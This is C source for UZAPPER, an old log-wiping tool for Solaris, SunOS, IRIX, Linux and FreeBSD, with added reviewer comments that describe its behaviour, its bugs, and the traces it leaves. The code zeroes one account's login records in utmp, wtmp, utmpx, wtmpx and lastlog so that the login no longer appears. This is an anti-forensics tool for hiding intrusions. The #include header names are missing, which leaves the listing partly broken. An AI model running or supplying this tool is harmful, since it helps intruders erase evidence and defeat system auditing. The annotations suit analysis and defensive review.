/*=============================================================================
   UZAPPER Ver1.00 for Solaris, SunOS, IRIX, Linux, FreeBSD
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (unewn4th@usa.net)
  =============================================================================
*/
/*
 * Reviewer notes (what the listing does, read from the code below):
 *
 *  - Takes one account name and overwrites that account's login records in
 *    the local utmp/wtmp files (and the utmpx/wtmpx variants when UTMPX is
 *    defined), then overwrites the account's lastlog entry.
 *  - Records are overwritten in place with zero bytes; nothing is removed or
 *    truncated. The affected files therefore keep their length and contain
 *    zero-filled record slots where the entries used to be.
 *  - Only the local files named by the path macros below (plus UTMPX_FILE /
 *    WTMPX_FILE from the system headers) are opened. Nothing here touches
 *    syslog output, audit trails, process accounting or copies held off-host,
 *    so those remain available for cross-checking.
 *  - All modifications use ordinary open(O_RDWR)/write() calls, so audit or
 *    file-integrity rules that watch these paths for writes would be expected
 *    to record them.
 *  - Each successful pass prints a "Wiped ..." line to stdout.
 *
 * The header names after each #include are missing from the page as captured
 * (most likely lost during extraction); they are left as found.
 */
#include
#include
#include
#include
#ifdef UTMAXTYPE
#define UTMPX
#include
#endif
#include
#ifndef _PATH_LASTLOG
#include
#endif
#include
#include
#include

/* Per-platform locations of the login-record files this program opens. */
#define SVR4_UTMP "/var/adm/utmp"
#define SVR4_WTMP "/var/adm/wtmp"
#define SVR4_LASTLOG "/var/adm/lastlog"
#define SUNOS4_UTMP "/etc/utmp"
#define SUNOS4_WTMP "/usr/adm/wtmp"
#define SUNOS4_LASTLOG "/usr/adm/lastlog"
#define BSD_UTMP "/var/run/utmp"
#define BSD_WTMP "/var/log/wtmp"
#define BSD_LASTLOG "/var/log/lastlog"
/* Size of every fixed path buffer in this file. */
#define MAX_FPATH 512

/*
 * wipe_log: zero every record in a utmp-style file whose user field starts
 * with `user`.
 *
 *   path  file to process; an empty string makes the function return 1
 *         without opening anything
 *   user  account name to match
 *   type  0 selects struct utmp records; any other value selects struct utmpx
 *         records, but only when UTMPX is defined
 *
 * Returns 1 for an empty path, -1 when open() does not yield a positive
 * descriptor, 0 otherwise. The number of overwritten records is printed.
 *
 * Observations:
 *  - The comparison is strncmp() over strlen(user) bytes, i.e. a prefix
 *    match: records of other accounts whose names begin with `user` are
 *    zeroed as well.
 *  - A matched record is replaced by sz zero bytes at the same offset, so the
 *    file length does not change and the slot is left zero-filled.
 *  - When type is non-zero and UTMPX is not defined, ent, un and sz are never
 *    assigned before the read loop uses them.
 *  - The return values of read() (beyond > 0), lseek() and write() are not
 *    checked; a short read is processed like a full record.
 *  - The `<=0` test treats descriptor 0 as a failure and returns without
 *    closing it.
 */
int wipe_log(path,user,type)
char *path,*user;
int type;
{
    struct utmp utmp_ent;
#ifdef UTMPX
    struct utmpx utmpx_ent;
#endif
    void *ent;
    char *un;
    int sz,fd,c=0;

    if (strlen(path)==0) return(1);
    /* Select record buffer, user-name field and record size for the format. */
    if (type==0){
        ent=(void *)&utmp_ent;
#ifdef UTMPX
        un=(char *)&utmp_ent.ut_user;
#else
        un=(char *)&utmp_ent.ut_name;
#endif
        sz=sizeof(struct utmp);
    }else{
#ifdef UTMPX
        ent=(void *)&utmpx_ent;
        un=(char *)&utmpx_ent.ut_user;
        sz=sizeof(struct utmpx);
#endif
    }
    if ((fd=open(path,O_RDWR))<=0) return(-1);
    /* Walk the file one fixed-size record at a time. */
    while(read(fd,ent,sz)>0)
        if (!strncmp(un,user,strlen(user))){
            /* Zero the in-memory record, step back one record, overwrite it. */
            memset(ent,0,sz);
            lseek(fd,-sz,SEEK_CUR);
            write(fd,ent,sz);
            c++;
        }
    close(fd);
    printf("Wiped %d entries of %s from %s.\n",c,user,path);
    return(0);
}

/*
 * wipe_lastlog: overwrite one account's lastlog entry with an all-zero
 * struct lastlog.
 *
 *   path  type 0: the lastlog file itself; otherwise a directory that holds
 *         one file per account
 *   user  account name, resolved with getpwnam()
 *   type  0: the entry is located at pw_uid * sizeof(struct lastlog) inside
 *         `path`; non-zero: the entry is written at the start of the file
 *         "path/user"
 *
 * Returns -1 when the account is unknown, -2 when open() does not yield a
 * positive descriptor, 0 otherwise.
 *
 * Observations:
 *  - strcpy()/sprintf() copy into the MAX_FPATH-byte buffer with no length
 *    check.
 *  - lseek() and write() results are not checked.
 *  - The entry ends up as all zero bytes. A zeroed entry for an account that
 *    other sources show as having logged in is worth treating as an
 *    inconsistency during review.
 */
int wipe_lastlog(path,user,type)
char *path,*user;
int type;
{
    struct passwd *p;
    struct lastlog ent;
    int fd;
    char buffer[MAX_FPATH];

    if (type==0) strcpy(buffer,path);
    else sprintf(buffer,"%s/%s",path,user);
    memset(&ent,0,sizeof(struct lastlog));
    if ((p=getpwnam(user))==NULL) return(-1);
    if ((fd=open(buffer,O_RDWR))<=0) return(-2);
    /* Single-file layout: entries are indexed by numeric uid. */
    if (type==0) lseek(fd,p->pw_uid*sizeof(struct lastlog),SEEK_SET);
    write(fd,&ent,sizeof(struct lastlog));
    close(fd);
    /* The format string below is split across two lines in the page as
       captured; it is left exactly as found. */
    printf("Wiped %s from 
%s.\n",user,path);
    return(0);
}

/*
 * main: expects exactly one argument, an existing account name.
 *
 * The platform is chosen at run time from uname().sysname ("SunOS", "Linux",
 * "FreeBSD", "IRIX") combined with the compile-time UTMPX switch, which
 * decides the utmp/wtmp/lastlog paths and the lastlog layout passed on.
 * The five wipe calls at the end are made unconditionally.
 *
 * Observations:
 *  - On the Linux/FreeBSD branch lastlog_type is never assigned before it is
 *    passed to wipe_lastlog().
 *  - On the "System Unknown" branches the message is printed but execution
 *    continues, so the wipe calls receive f_utmp, f_wtmp and f_lastlog
 *    buffers that were never filled in.
 *  - f_utmpx and f_wtmpx start as empty strings; unless a UTMPX branch fills
 *    them, wipe_log() returns early for those two calls.
 *  - Return values of the wipe calls are ignored and main has no return
 *    statement.
 */
main(argc,argv)
int argc;
char *argv[];
{
    char f_utmp[MAX_FPATH],f_utmpx[MAX_FPATH];
    char f_wtmp[MAX_FPATH],f_wtmpx[MAX_FPATH];
    char f_lastlog[MAX_FPATH];
    struct utsname utname;
    int lastlog_type;

    if (argc!=2){
        printf("Usage: %s Usernane\n",argv[0]);
        exit(1);
    }
    /* Reject names that are not present in the password database. */
    if (getpwnam(argv[1])==NULL){
        printf("Unknown user : %s\n",argv[1]);
        exit(1);
    }
    uname(&utname);
    strcpy(f_wtmpx,"");
    strcpy(f_utmpx,"");
    if (!strcmp(utname.sysname,"SunOS")){
#ifdef UTMPX
        /* SunOS built with utmpx support: SVR4 paths plus the x-variants. */
        strcpy(f_utmp, SVR4_UTMP);
        strcpy(f_wtmp, SVR4_WTMP);
        strcpy(f_utmpx, UTMPX_FILE);
        strcpy(f_wtmpx, WTMPX_FILE);
        strcpy(f_lastlog, SVR4_LASTLOG);
        lastlog_type=0;
#else
        strcpy(f_utmp, SUNOS4_UTMP);
        strcpy(f_wtmp, SUNOS4_WTMP);
        strcpy(f_lastlog, SUNOS4_LASTLOG);
        lastlog_type=0;
#endif
    }else if (!strcmp(utname.sysname,"Linux") || !strcmp(utname.sysname,"FreeBSD")){
        strcpy(f_utmp, BSD_UTMP);
        strcpy(f_wtmp, BSD_WTMP);
        strcpy(f_lastlog, BSD_LASTLOG);
    }else if (!strcmp(utname.sysname,"IRIX")){
#ifdef UTMPX
        strcpy(f_utmp, SVR4_UTMP);
        strcpy(f_wtmp, SVR4_WTMP);
        strcpy(f_utmpx, UTMPX_FILE);
        strcpy(f_wtmpx, WTMPX_FILE);
        strcpy(f_lastlog, SVR4_LASTLOG);
        /* Non-zero selects the per-account-file layout in wipe_lastlog(). */
        lastlog_type=1;
#else
        printf("Can not wipe. System Unknown.\n");
#endif
    }else
        printf("Can not wipe. System Unknown.\n");

    wipe_log(f_utmp, argv[1],0);
    wipe_log(f_utmpx,argv[1],1);
    wipe_log(f_wtmp, argv[1],0);
    wipe_log(f_wtmpx,argv[1],1);
    wipe_lastlog(f_lastlog,argv[1],lastlog_type);
}